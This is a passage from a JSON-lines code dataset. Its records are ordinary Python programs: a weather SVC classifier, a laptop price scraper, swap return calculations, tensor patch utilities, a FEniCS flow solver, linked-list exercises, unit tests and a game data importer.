HDR # overwrite previous text & set the text color to green\nNO_OVERWRITE = '\\033[32;1m' + HDR # NO_OVERWRITE colors lines green that don't use overwrite\nSYSOUT = sys.stdout\n\n# TODO: Add documentation\n\n\ndef main(training_filename: str, test_filename: str) -> None:\n\n title: str = Figlet(font='larry3d').renderText('Weather Data')\n SYSOUT.write(f'\\033[34;1m{title}\\033[00m') # formatted start up message\n SYSOUT.write(\"\\033[32;1mProgram Initialized Successfully\\033[00m\\n\")\n\n train_and_test(training_filename, test_filename) # train & test the model(s)\n\n\ndef train_and_test(training_filename: str, test_filename: str):\n\n # * Read the Two CSV Files into Dataframes * #\n SYSOUT.write(HDR + 'Reading in CSVs...')\n training: np.ndarray = np.genfromtxt(training_filename, delimiter=',', skip_header=1)\n testing: np.ndarray = np.genfromtxt(test_filename, delimiter=',', skip_header=1)\n SYSOUT.write(OVERWRITE + ' CSVs Parsed '.ljust(50, '-') + SUCCESS)\n\n # * Get the Labels & Features from the Training Data\n ftrs, labels = formatForSciKit(training)\n\n # * Create the SVC Model * #\n SYSOUT.write(HDR + 'Creating SVC Model...')\n SVC_model: SVC = SVC(kernel='sigmoid', random_state=SEED)\n SVC_model.fit(ftrs, labels) # train the model\n SYSOUT.write(OVERWRITE + ' SVC Model Created '.ljust(50, '-') + SUCCESS)\n\n # * Test the Model * #\n SYSOUT.write(HDR + 'Testing SVC Model...')\n ftrs, test_labels = formatForSciKit(testing)\n\n prediction_score = SVC_model.predict(ftrs) # make prediction\n score = accuracy_score(test_labels, prediction_score) # test prediction\n mType: str = 'SVC'\n SYSOUT.write(OVERWRITE + ' SVC Model Tested '.ljust(50, '-') + SUCCESS)\n\n # * Report Result * #\n percentScore: float = round(score * 100, 1) # turn the score into a percent with 2 decimal places\n\n if percentScore > 75: # > 75 print in green\n SYSOUT.write(f'\\r\\033[32;1m{mType} Accuracy is: {percentScore}%\\033[00m\\n')\n SYSOUT.flush()\n\n elif 45 < percentScore < 75: # > 45 and < 75 print yellow\n SYSOUT.write(f'\\r\\033[33;1m{mType} Accuracy is: {percentScore}%\\033[00m\\n')\n SYSOUT.flush()\n\n elif percentScore < 45: # < 45 print in red\n SYSOUT.write(f'\\r\\033[91;1m{mType} Accuracy is: {percentScore}%\\033[00m\\n')\n SYSOUT.flush()\n\n else: # don't add color, but print accuracy\n SYSOUT.write(f'{mType} Accuracy is: {percentScore}%\\n')\n SYSOUT.flush()\n\n\ndef formatForSciKit(data: np.ndarray) -> (np.ndarray, np.ndarray):\n \"\"\"\n formatForSciKit takes the input data and converts it into a form that can\n be understood by the sklearn package. It does this by separating the features\n from their labels and returning them as two different numpy arrays.\n\n :param data: The input data, from a read in CSV.\n :type data: np.ndarray\n\n :return: The input file in a form parsable by sklearn.\n :rtype: tuple[np.ndarray, np.ndarray]\n \"\"\"\n\n # create the label array Y (the target of our training)\n # from all rows, pick the 0th column\n try:\n # + data[:, :1] get every row but only the first column\n flat = np.ravel(data[:, :1]) # get a list of all the labels as a list of lists & then flatten it\n labels = np.array(flat) # convert the label list to a numpy array\n # create the feature matrix X ()\n # + data[:, 1:] get every row but drop the first column\n ftrs = np.array(data[:, 1:]) # get everything BUT the labels/ids\n\n except (TypeError, IndexError) as err:\n lineNm = sys.exc_info()[-1].tb_lineno # get the line number of error\n msg = f'{str(err)}, line {lineNm}:\\ndata = {data}\\ndimensions = {data.ndim}'\n log.error(msg) # log the error\n printError(msg) # print message\n traceback.print_stack() # print stack trace\n sys.exit(-1) # exit on error; recovery not possible\n\n return ftrs, labels\n\n\ndef printError(message: str) -> None:\n \"\"\"\n printError is used for coloring error messages red.\n\n :param message: The message to be printed.\n :type message: str\n\n :return: printError does not return, but rather prints to the console.\n :rtype: None\n \"\"\"\n print(\"\\033[91;1m {}\\033[00m\".format(message))\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"261990428","text":"import concurrent.futures\nimport requests\nfrom bs4 import BeautifulSoup\nfrom loguru import logger\n\nlogger.add('rozetka_logger.log', format='{time} {message} {level}', level='DEBUG', rotation='10 MB', compression='zip')\n\nHEADERS = {\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',\n 'accept': '/*/'}\nFILE = 'laptops.csv'\n\n\ndef get_html(url):\n return requests.get(url, headers=HEADERS)\n\n\ndef get_pages_count(html):\n soup = BeautifulSoup(html, 'html.parser')\n pagination = soup.find_all('a', class_='pagination__link')\n if pagination:\n return int(pagination[-1].get_text())\n else:\n return 1\n\n\ndef get_content(html):\n soup = BeautifulSoup(html, 'html.parser')\n items = soup.find_all('div', class_='goods-tile__inner')\n laptops = []\n for item in items:\n if item.find('div', class_='goods-tile__availability').get_text(strip=True) == 'Есть в наличии':\n laptops.append({\n 'model': item.find('span', class_='goods-tile__title').get_text(strip=True),\n 'link': item.find('a').get('href'),\n 'price': float(\n item.find('span', class_='goods-tile__price-value').get_text(strip=True).replace(' ',\n '.').replace(\n ' ',\n '.')),\n 'pictures': item.find('img', class_='lazy_img_hover display-none').get('src')\n })\n print(laptops)\n \"\"\"\"You can return you laptopst sort by price or another keys with this code: sorted(laptops, key=lambda x: x['price']\"\"\"\n return laptops\n\n\ndef parse(model):\n url = f'https://rozetka.com.ua/notebooks/c80004/producer={model}'\n html = get_html(url)\n if html.status_code == 200:\n laptops = []\n urls = []\n pages_count = get_pages_count(html.text)\n for page in range(1, pages_count + 1):\n logger.debug(f'parsing page {page} of {pages_count}...')\n urls.append(f'https://rozetka.com.ua/notebooks/c80004/page={page};producer={model}')\n with concurrent.futures.ThreadPoolExecutor() as executor:\n results = [executor.submit(get_html, url) for url in urls]\n for _ in concurrent.futures.as_completed(results):\n laptops.extend(get_content(html.text))\n logger.debug(f'we get {len(laptops)} laptops {model}')\n return laptops\n else:\n logger.debug('something wrong with parser!')","sub_path":"telegram_bot/rozetka_parser.py","file_name":"rozetka_parser.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"595139283","text":"import pandas as pd\n\nimport numpy as np\n\nimport datetime as dt\n\n \n\nimport panormus.quant.alib.utils as qau\n\nfrom panormus.markable.loader import loader\n\nfrom panormus.quant.alib import conventions\n\nfrom panormus.trade.irs import IRSTrade\n\nfrom panormus.markable import irs as irs_mble\n\nfrom panormus.quant import market_date\n\nholiday_oracle = qau.Holidays()\n\n \n\n \n\nclass irs_markable_lc(irs_mble.IRS):\n\n '''\n\n local irs market value calculator\n\n '''\n\n def __init__(self, trade, asof_date, holiday_oracle, curve_loader, fixings_loader, curve_names_dict):\n\n super(irs_markable_lc,self).__init__(trade, asof_date, holiday_oracle, curve_loader, fixings_loader,\n\n curve_names_dict)\n\n \n\n def forward_nday_return(self, trade_day_calendar=None):\n\n if trade_day_calendar is None:\n\n trade_day_calendar = self.trade.holiday_calendar_name\n\n \n\n #try:\n\n forward_date = qau.ac_bus_days_offset(\n\n self.asof_date, 1, self.holiday_oracle[self.trade.holiday_calendar_name])\n\n forward_date_orig = forward_date\n\n \n\n forward_swap_calculation_results = irs_mble.calculate_swap_values(\n\n self.trade, forward_date, self.holiday_oracle, self.curve_loader, self.fixings_loader,\n\n self.curve_names_dict)\n\n \n\n ## advance forward one good day if invalid return\n\n max_days = 90\n\n curr_days = 1\n\n \n\n while np.isnan(forward_swap_calculation_results.market_value) and curr_days <= max_days:\n\n forward_date = qau.ac_bus_days_offset(\n\n forward_date, 1, self.holiday_oracle[self.trade.holiday_calendar_name])\n\n irs_mble.warnings.warn(\n\n 'Warning: unexpected missing curve, %s curve does not exist on %s, trying %s' % (\n\n self.trade.swap_conv, forward_date_orig.strftime('%Y%m%d'), forward_date.strftime('%Y%m%d')))\n\n forward_swap_calculation_results = irs_mble.calculate_swap_values(\n\n self.trade, forward_date, self.holiday_oracle, self.curve_loader, self.fixings_loader,\n\n self.curve_names_dict)\n\n curr_days += 1\n\n \n\n return {'forward_return':forward_swap_calculation_results.market_value - self.market_value(),\n\n 'forward_date':forward_date\n\n }\n\n # except:\n\n # print ('error in running forward_nday_return; return empty')\n\n # print ('As of date = ',self.asof_date)\n\n # return {'forward_return':np.nan,\n\n # 'forward_date':qau.ac_bus_days_offset(\n\n # self.asof_date, 1, self.holiday_oracle[self.trade.holiday_calendar_name])\n\n # }\n\n \n\nclass excess_return_index:\n\n def __init__(self,region='ny'):\n\n '''\n\n :param region: 'ny','lon' and so forth\n\n '''\n\n self.hols = qau.Holidays()\n\n self.curve_loader = loader.CurveLoaderAlib(region)\n\n self.fixings_loader = loader.FixingsLoaderOpenData()\n\n \n\n def one_period_return(self,d,swap_str,fwd_starting,tenor):\n\n start_date, end_date = qau.dates_from_trade_date(d, fwd_starting, tenor, swap_str, self.hols)\n\n # calculate the par rate\n\n par_rate = irs_mble.calculate_swap_par_rate(swap_str, d, start_date, end_date, self.hols, self.curve_loader,\n\n conventions.CURVE_NAMES_DICT)\n\n irs_tr = IRSTrade('temp', swap_str, start_date, end_date, par_rate, 'r', self.hols)\n\n irs_mkble = irs_markable_lc(irs_tr, d, self.hols, self.curve_loader, self.fixings_loader, conventions.CURVE_NAMES_DICT)\n\n #mv = irs_mkble.market_value()\n\n # trade today and held till tomorrow.. this is fwd looking.. this is actually tomorrows rtn\n\n result_dict = irs_mkble.forward_nday_return()\n\n return result_dict\n\n \n\n def get_mv_rtn_stream(self,sd,ed,swap_str,fwd_starting,tenor):\n\n '''\n\n :param sd: start date\n\n :param ed: end date\n\n :param swap_str: USD.3ML\n\n :param fwd_starting: 3M\n\n :param tenor: 5Y\n\n :return: stream of market value and 1 day return\n\n '''\n\n sd,ed = dt.datetime.strptime(sd,\"%Y-%m-%d\"),dt.datetime.strptime(ed,\"%Y-%m-%d\")\n\n trading_days = market_date.trading_date_list(sd, ed, holiday_oracle['CAD+USD.FX'])\n\n ret_list = []\n\n effective_date_list = []\n\n d = trading_days[0]\n\n while d<=trading_days[-1]:\n\n result_dict = self.one_period_return(d,swap_str,fwd_starting,tenor)\n\n ret_list.append(result_dict['forward_return'])\n\n effective_date_list.append(result_dict['forward_date'])\n\n d = effective_date_list[-1]\n\n \n\n df_ret = pd.DataFrame(index=effective_date_list,columns = ['return'],data = ret_list)\n\n df_ret = df_ret.dropna()\n\n return df_ret.dropna()\n\n \n\nif __name__ == '__main__':\n\n swap_str = 'GBR.3ML'\n\n ins = excess_return_index('ny')\n\n data = ins.get_mv_rtn_stream('2007-11-29','2020-02-01',swap_str,'3M','5Y')\n\n print (data)\n\n #data.to_csv('CAD_libor_3m5y.csv')","sub_path":"Caxton/JY_Completed/current_version/production_ver/Analytics/swap_pricing_example_return_index.py","file_name":"swap_pricing_example_return_index.py","file_ext":"py","file_size_in_byte":5127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"247565779","text":"__author__ = 'yunbo'\n\nimport numpy as np\nimport os\nimport datetime\nimport re\nimport h5py\nfrom pathlib import Path\n\ndef reshape_patch(img_tensor, patch_size_width, patch_size_height=None):\n if patch_size_height is None:\n patch_size_height = patch_size_width\n assert 5 == img_tensor.ndim\n batch_size = np.shape(img_tensor)[0]\n seq_length = np.shape(img_tensor)[1]\n img_height = np.shape(img_tensor)[2]\n img_width = np.shape(img_tensor)[3]\n num_channels = np.shape(img_tensor)[4]\n a = np.reshape(img_tensor, [batch_size, seq_length,\n int(img_height/patch_size_height), patch_size_height,\n int(img_width/patch_size_width), patch_size_width,\n num_channels])\n\n b = np.transpose(a, [0,1,2,4,3,5,6])\n patch_tensor = np.reshape(b, [batch_size, seq_length,\n int(img_height/patch_size_height),\n int(img_width/patch_size_width),\n patch_size_width*patch_size_height*num_channels])\n return patch_tensor\n\ndef reshape_patch_back(patch_tensor, patch_size_width, patch_size_height=None):\n if patch_size_height is None:\n patch_size_height = patch_size_width\n\n assert 5 == patch_tensor.ndim\n batch_size = np.shape(patch_tensor)[0]\n seq_length = np.shape(patch_tensor)[1]\n patch_height = np.shape(patch_tensor)[2]\n patch_width = np.shape(patch_tensor)[3]\n channels = np.shape(patch_tensor)[4]\n img_channels = int(channels / (patch_size_width*patch_size_height))\n a = np.reshape(patch_tensor, [batch_size, seq_length,\n patch_height, patch_width,\n patch_size_height, patch_size_width,\n img_channels])\n b = np.transpose(a, [0,1,2,4,3,5,6])\n img_tensor = np.reshape(b, [batch_size, seq_length,\n int(patch_height * patch_size_height),\n int(patch_width * patch_size_width),\n img_channels])\n return img_tensor\n\ndef return_date(file_name):\n \"\"\"Auxilliary function which returns datetime object from Traffic4Cast filename.\n\n Args.:\n file_name (str): file name, e.g., '20180516_100m_bins.h5'\n\n Returns: date string, e.g., '2018-05-16'\n \"\"\"\n\n match = re.search(r'\\d{4}\\d{2}\\d{2}', file_name)\n date = datetime.datetime.strptime(match.group(), '%Y%m%d').date()\n return date\n\ndef list_filenames(directory, excluded_dates=[]):\n \"\"\"Auxilliary function which returns list of file names in directory in random order,\n filtered by excluded dates.\n\n Args.:\n directory (str): path to directory\n excluded_dates (list): list of dates which should not be included in result list,\n e.g., ['2018-01-01', '2018-12-31']\n\n Returns: list\n \"\"\"\n filenames = os.listdir(directory)\n # np.random.shuffle(filenames)\n\n if len(excluded_dates) > 0:\n # check if in excluded dates\n excluded_dates = [datetime.datetime.strptime(x, '%Y-%m-%d').date() for x in excluded_dates]\n filenames = [x for x in filenames if return_date(x) not in excluded_dates]\n\n return filenames\n\ndef write_data(data, filename):\n f = h5py.File(filename, 'w', libver='latest')\n dset = f.create_dataset('array', shape=(data.shape), data = data, compression='gzip', compression_opts=9)\n f.close()\n\ndef create_directory_structure(root):\n berlin = os.path.join(root, \"Berlin\",\"Berlin_test\")\n istanbul = os.path.join(root, \"Istanbul\",\"Istanbul_test\")\n moscow = os.path.join(root, \"Moscow\", \"Moscow_test\")\n try:\n os.makedirs(berlin)\n os.makedirs(istanbul)\n os.makedirs(moscow)\n except OSError:\n print(\"failed to create directory structure\")\n # sys.exit(2)\n\ndef construct_road_network_from_grid_condense(\n row_patch, col_patch, file_dir, least_ratio=0.033):\n\n print(\"1. Query a nodes from the validation data folder \")\n # Search for all h5 files\n p = Path(file_dir)\n assert (p.is_dir())\n files = p.glob('*.h5')\n data_all = []\n for h5dataset_fp in files:\n file_path = str(h5dataset_fp.resolve())\n with h5py.File(file_path, 'r') as f:\n data = f['array'][()]\n data_all.append(data)\n data_all = np.stack(data_all, axis=0)\n batch, timeslots, rows, cols, num_channels = data_all.shape\n data_patch = np.reshape(data_all, (batch, timeslots, rows//row_patch, row_patch,\n cols//col_patch, col_patch, num_channels))\n non_zeros = np.sum(data_patch > 0, axis=(0, 1, 3, 5, 6))\n total_num_counts = batch * timeslots * row_patch * col_patch * num_channels\n non_zeros_x, non_zeros_y = np.nonzero(non_zeros > total_num_counts * least_ratio)\n node_pos = np.stack([non_zeros_x, non_zeros_y], axis=1)\n\n return node_pos","sub_path":"utils/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":4989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"482265171","text":"def FandR(find, replace, filename, save):\r\n print(filename)\r\n print(\"-------------------------------\")\r\n\r\n infile = open(str(filename), 'r')\r\n contents = infile.read()\r\n print(contents)\r\n print(\"-------------------------------\")\r\n \r\n with open(str(filename), 'r') as infile:\r\n contents = infile.read()\r\n contents = contents.replace(str(find), str(replace))\r\n print(contents)\r\n print(\"\")\r\n \r\n if(save == True): \r\n raw = open(str(filename), 'w')\r\n raw.write(contents)\r\n raw.close()\r\n\r\n'''\r\nThis program will find and replace thing in text files that a normal\r\nfind and replace function cannot, like adding in new lines.\r\nIt will then print the entire text file to the screen, where it can be copied\r\nand saved. The find and replace parameters are as follows:\r\n\r\ncontents = contents.replace('FIND','REPLACE')\r\n\r\nThe escape characters like \\n are useable.\r\n\r\nThe file t read from is on the firsst line as follows:\r\n\r\nwith open(\"filename.txt\") as infile\r\n'''\r\n\r\nFandR(\"o\", \"0\", \"example.txt\", True)\r\nprint(\"\")\r\nFandR(\"O\", \"()\", \"example.txt\", True)\r\n","sub_path":"Text_Editing_Generation/findAndReplace.py","file_name":"findAndReplace.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"46445912","text":"from dolfin import *\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nr0 = 0.3\nr1 = 1\nu_inner = 0\nu_outer = 0.1\nN = 100\n\n\"\"\"\nu_theta = r0*omega0*(r1/r-r/r1)/(r1/r0-r0/r1) \\\n\t\t+ r1*omega1*(r/r0-r0/r)/(r1/r0-r0/r1)\n\"\"\"\n\n\n\nmesh = IntervalMesh(N,r0,r1)\nV = FunctionSpace(mesh, 'Lagrange', 1)\nu = TrialFunction(V)\nv = TestFunction(V)\n\ndef inner_bc(x, on_boundary):\n return near(x[0],r0) and on_boundary\n\ndef outer_bc(x, on_boundary):\n return near(x[0],r1) and on_boundary\n\nbc_inner = DirichletBC(V, u_inner, inner_bc)\nbc_outer = DirichletBC(V, u_outer, outer_bc)\n\nbcs = [bc_inner,bc_outer]\n\nr = Expression('x[0]')\n\na = - r*inner(nabla_grad(u),nabla_grad(v))*dx - (1/r)*inner(v,u)*dx\nL = Constant('0')*v*r*dx\nu_ = Function(V)\nsolve(a == L, u_, bcs)\n\nplot(u_,interactive=True)\n\n","sub_path":"Week4/CouetteRot1D.py","file_name":"CouetteRot1D.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"75692977","text":"import math\nimport os,sys\nsys.path.insert(1, os.path.join(sys.path[0], '..'))\nimport utils\n\nutils.__Title__(\"2.1 연결리스트 중복없애기\")\nclass Node :\n def __init__(self, item):\n self.item = item\n self.prev = None\n self.next = None\n\nclass LinkedList :\n def __init__(self, list = []):\n self.top = None\n for item in list :\n node = Node(item)\n self.append(node)\n\n def append(self, item) :\n if self.top == None :\n self.top = item\n else :\n cur = self.top\n prev = None\n while cur != None :\n prev = cur\n cur = cur.next\n prev.next = item\n item.prev = prev\n\n def remove(self, node):\n if node.prev != None :\n node.prev.next = node.next\n if node.next != None :\n node.next.prev = node.prev\n\n def __repr__(self):\n list = []\n cur = self.top\n while cur != None :\n list.append(cur.item)\n cur = cur.next\n return str(list)\n\ndef removeDuplicate(list) :\n uniqItems = set()\n\n cur = list.top\n while cur != None :\n if cur.item in uniqItems :\n list.remove(cur)\n else :\n uniqItems.add(cur.item)\n cur = cur.next\n return list\n\nlist = [1,2,3,1,5,6,7,2,1]\nutils.__print__(list)\nlinkedList = LinkedList(list)\nutils.__print__(removeDuplicate(linkedList)) # O(N)\n\n\nutils.__Title__(\"2.2 단방향 연결리스트에서 뒤에서 N번째 원소\")\ndef getReverseAt(list, n) :\n pre = list.top\n cur = list.top\n\n # prefetch iterator\n count = 0\n while pre != None :\n pre = pre.next\n if count == n :\n break\n count = count + 1\n\n # next iterator\n while pre != None :\n cur = cur.next\n pre = pre.next\n\n if cur != None :\n return cur.item\n else :\n return None\n\nlist = [1,2,3,1,5,6,7,2,1]\nutils.__print__(list)\nlinkedList = LinkedList(list)\nutils.__print__(getReverseAt(linkedList, 2)) # O(N)\n\nutils.__Title__(\"2.3 단방향 연결리스트에서 주어진 노드 삭제 (head 알수 없음)\")\ndef getAt(list, n) :\n cur = list.top\n idx = 1\n while cur != None :\n if idx == n :\n return cur\n cur = cur.next\n idx = idx + 1\n return None\n\ndef removeNode(node) :\n next = node.next\n\n if next != None :\n # 다음 노드의 값을 복사한다.\n node.item = next.item\n # node.next를 다음 노드의 next를 가리킨다\n node.next = next.next\n\nlist = [1,2,3,1,5,6,7,2,1]\nutils.__print__(list)\nlinkedList = LinkedList(list)\ntarget = getAt(linkedList, 3)\nutils.__print__(target.item)\nremoveNode(target)\nutils.__print__(linkedList) # O(N)\n\nutils.__Title__(\"2.5 리스트가 하나의 숫자를 가리킨다고 가정할 때, 두 리스트의 합을 반환하는 리스트\")\n# 7->1->6, 5->9->2 617 + 295 => 912 => 2->1->9\ndef sumLists_v1(list1, list2) :\n sum = getNumber(list1) + getNumber(list2)\n return LinkedList(toList(sum))\n\ndef getNumber(list) : # O(3N)\n nums = []\n cur = list.top\n while cur != None :\n nums.append(str(cur.item))\n cur = cur.next\n nums.reverse()\n return int(\"\".join(nums))\n\ndef toList(num) :\n list = [c for c in str(num)]\n list.reverse()\n return list\n\nlist1 = LinkedList([7,1,6])\nlist2 = LinkedList([5,9,2])\nsumList = sumLists_v1(list1, list2) # O(8N)\nutils.__print__(sumList)\n\ndef sumLists_v2(list1, list2) :\n n1 = list1.top\n n2 = list2.top\n\n list = LinkedList()\n passNum = 0\n while n1 != None or n2 != None :\n sum = getNum(n1) + getNum(n2)\n num = (sum % 10)\n list.append(Node(num + passNum))\n passNum = int(sum / 10)\n n1 = n1.next\n n2 = n2.next\n return list\n\ndef getNum(node) :\n if node != None and node.item != None :\n return node.item\n else :\n return 0\n\nlist1 = LinkedList([7,1,6])\nlist2 = LinkedList([5,9,2])\nsumList2 = sumLists_v2(list1, list2)\nutils.__print__(sumList2)\n\nutils.__Title__(\"2.6 주어진 연결 리스트가 회문인지 확인하는 함수\")\n# 0->1->2->1->0 => 회문\ndef isPalindrome_v1(list) :\n items = []\n\n cur = list.top\n while cur != None :\n items.append(cur.item)\n cur = cur.next\n\n startIdx = 0\n endIdx = len(items) - 1\n while startIdx <= endIdx :\n if items[startIdx] != items[endIdx] :\n return False\n startIdx = startIdx + 1\n endIdx = endIdx - 1\n return True\n\n# Doubly linked list인 경우\ndef isPalindrome_v2(list) :\n length = 1\n last = list.top\n while last.next != None :\n length = length + 1\n last = last.next\n\n first = list.top\n count = math.ceil(length / 2)\n for i in range(0, count) :\n if first.item != last.item :\n return False\n first = first.next\n last = last.prev\n return True\n\n# fast runner, slow runner\ndef isPalindrome_v3(list) :\n fast = list.top\n slow = list.top\n\n items = []\n while fast != None and fast.next != None :\n items.append(slow.item)\n fast = fast.next.next\n slow = slow.next\n\n # 가운데 값 skip\n if fast != None :\n slow = slow.next\n\n idx = len(items) - 1\n while slow != None :\n if items[idx] != slow.item :\n return False\n idx = idx - 1\n slow = slow.next\n return True\n\nlist1 = LinkedList([1,2,4,6,4,2,1])\nlist2 = LinkedList([1,2,4,4,2,1])\nlist3 = LinkedList([1,2,3,4,2,1])\nutils.__print__(isPalindrome_v1(list1)) # O(N)\nutils.__print__(isPalindrome_v1(list2))\nutils.__print__(isPalindrome_v1(list3))\nutils.__print__(isPalindrome_v2(list1)) # O(N)\nutils.__print__(isPalindrome_v2(list2))\nutils.__print__(isPalindrome_v2(list3))\nutils.__print__(isPalindrome_v3(list1)) # O(N)\nutils.__print__(isPalindrome_v3(list2))\nutils.__print__(isPalindrome_v3(list3))\n\nutils.__Title__(\"2.7 값도 위치도 동일한 두 리스트의 교집합 : 마지막 노드가 같아야 함\")\n# 1->2->3, 2->3 교집합 (2->3)\n# 1->2->3, 2->3->1 교집합 없음\ndef iterator(list, func) :\n cur = list.top\n while cur != None :\n func(cur)\n cur = cur.next\n\ndef getItems(list) :\n items = []\n iterator(list, lambda i: items.append(i.item))\n return items\n\ndef findSameNode_v1(list1, list2) :\n items1 = getItems(list1)\n items2 = getItems(list2)\n\n idx1 = len(items1) - 1\n idx2 = len(items2) - 1\n while idx1 >= 0 and idx2 >= 0:\n if items1[idx1] != items2[idx2] :\n break\n idx1 = idx1 - 1\n idx2 = idx2 - 1\n return LinkedList(items1[idx1 + 1:])\n\ndef getListInfo(list) :\n last = None\n size = 0\n\n cur = list.top\n while cur != None :\n last = cur\n size = size + 1\n cur = cur.next\n\n return {\n \"last\" : last,\n \"size\" : size\n }\n\ndef findSameNode_v2(list1, list2) :\n first = getListInfo(list1)\n second = getListInfo(list2)\n\n if first[\"last\"].item != second[\"last\"].item :\n return LinkedList()\n else :\n f_cur = list1.top\n s_cur = list2.top\n # skip\n for i in range(0, first[\"size\"] - second[\"size\"]) :\n f_cur = f_cur.next\n\n for i in range(0, second[\"size\"] - first[\"size\"]) :\n s_cur = s_cur.next\n\n matched = None\n while f_cur != None and s_cur != None:\n if f_cur.item != s_cur.item :\n matched = None\n elif matched == None :\n matched = f_cur\n f_cur = f_cur.next\n s_cur = s_cur.next\n\n list1.top = matched\n return list1\n\nlist1 = LinkedList([1,2,3,4])\nlist2 = LinkedList([0,10,2,3,4])\nutils.__print__(list1)\nutils.__print__(list2)\nprint(\"findSameNode_v1\", findSameNode_v1(list1, list2))\nprint(\"findSameNode_v2\", findSameNode_v2(list1, list2))\n\nlist1 = LinkedList([1,2,3])\nlist2 = LinkedList([0,10,2,3,4])\nutils.__print__(list1)\nutils.__print__(list2)\nprint(\"findSameNode_v1\", findSameNode_v1(list1, list2))\nprint(\"findSameNode_v2\", findSameNode_v2(list1, list2))\n\nutils.__Title__(\"2.8 순환 연결리스트가 있을 때, 순환되는 첫째 노드를 반환하는 함수\")\n# A->B->C->D->E->C(앞의 C와 동일한 객체) => C\n","sub_path":"src/main/python/cci/linked-list.py","file_name":"linked-list.py","file_ext":"py","file_size_in_byte":8249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"616404157","text":"#!/usr/bin/env python\n\nimport sys\n\nfrom voice import *\nfrom graphics import *\n\nFPS=24\n\ndef main():\n display = init_display()\n\n while True:\n pygame.time.Clock().tick(FPS)\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n is_pressed = pygame.key.get_pressed()\n if is_pressed[K_SPACE]:\n draw(display, 'rec')\n rec()\n draw(display, 'wait')\n play()\n elif event.type == pygame.locals.QUIT:\n pygame.quit()\n sys.exit()\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"257469872","text":"#!/usr/bin/env python3\n\n\"\"\" Module to test lab3.py \"\"\"\n\n__author__ = 'Susan Sim'\n__email__ = \"ses@drsusansim.org\"\n__copyright__ = \"2015 Susan Sim\"\n__license__ = \"MIT License\"\n\nfrom lab3 import days_in_month\n\nMONTHS_WITH_31 = [\"January\", \"March\", \"May\", \"July\", \"August\", \"October\", \"December\"]\nMONTHS_WITH_30 = [\"April\", \"June\", \"September\", \"November\"]\nMONTHS_WITH_28_or_29 = [\"February\"]\n\n\ndef test_months_with_31():\n \"\"\"\n Test months with 31 days\n \"\"\"\n for item in MONTHS_WITH_31:\n assert days_in_month(item) == 31\n\n# Write a test function for the months with 30 days\ndef test_months_with_30():\n \"\"\"\n Test months with 30 days\n \"\"\"\n for item in MONTHS_WITH_30:\n assert days_in_month(item) == 30\n\n# Write a test function for the months with 28 or 29 days\ndef test_months_with_28_or_29():\n \"\"\"\n Test months with 28 or 29 days\n \"\"\"\n for item in MONTHS_WITH_28_or_29:\n assert days_in_month(item) == \"28 or 29\"\n\n# Write a test function for months that are not capitalized properly\n# Hint: use the lower() string method\n\ndef test_lower_months_with_31():\n \"\"\"\n Test months with 31 days with lowercase entry\n \"\"\"\n for item in MONTHS_WITH_31:\n item.lower()\n assert days_in_month(item) == 31\n\n\n# Write a test function for unexpected input\n# Hint: use a try/except block to deal with the exception\n# Hint: use data types other than strings as input\n\"\"\"\ntry:\n some funtion call\nexcept SomeError:\n We get here because an exception was raised\n assert False\n\"\"\"\n\n\ndef test_wrong_strings():\n \"\"\"\n Test for incorrect strings\n \"\"\"\n\n wrong_strings = [\"this\", \"can't\", \"be\", \"right\", \"12345\"]\n for item in wrong_strings:\n try:\n days_in_month(item)\n except ValueError:\n assert True\n\n\ndef test_wrong_attribute():\n \"\"\"\n Test for wrong data types\n \"\"\"\n wrong_attributes = [1, 4.5, False, [\"january\", \"March\"]]\n for item in wrong_attributes:\n try:\n days_in_month(item) == False\n except AttributeError:\n assert True","sub_path":"test_lab3.py","file_name":"test_lab3.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"631560643","text":"\"\"\"\nThis module imports data from files to db.\n\"\"\"\n\nimport os, glob, tempfile, zipfile, shutil\nfrom django.conf import settings\nfrom muddery.launcher.upgrader.upgrade_handler import UPGRADE_HANDLER\nfrom muddery.launcher import configs\nfrom muddery.launcher.utils import copy_tree\nfrom muddery.worldeditor.services.data_importer import import_file\nfrom muddery.worldeditor.dao import model_mapper\n\n\ndef unzip_data_all(fp):\n \"\"\"\n Import all data files from a zip file.\n \"\"\"\n temp_path = tempfile.mkdtemp()\n\n try:\n archive = zipfile.ZipFile(fp, 'r')\n archive.extractall(temp_path)\n source_path = temp_path\n \n # if the zip file contains a root dir\n file_list = os.listdir(temp_path)\n if len(file_list) == 1:\n path = os.path.join(temp_path, file_list[0])\n if os.path.isdir(path):\n source_path = path\n\n # Upgrade game data.\n UPGRADE_HANDLER.upgrade_data(source_path, None, configs.MUDDERY_LIB)\n\n # import data from path\n import_data_path(source_path)\n\n # load system localized strings\n # system data file's path\n system_data_path = os.path.join(settings.MUDDERY_DIR, settings.WORLD_DATA_FOLDER)\n\n # localized string file's path\n system_localized_string_path = os.path.join(system_data_path,\n settings.LOCALIZED_STRINGS_FOLDER,\n settings.LANGUAGE_CODE)\n\n # load data\n import_table_path(system_localized_string_path, 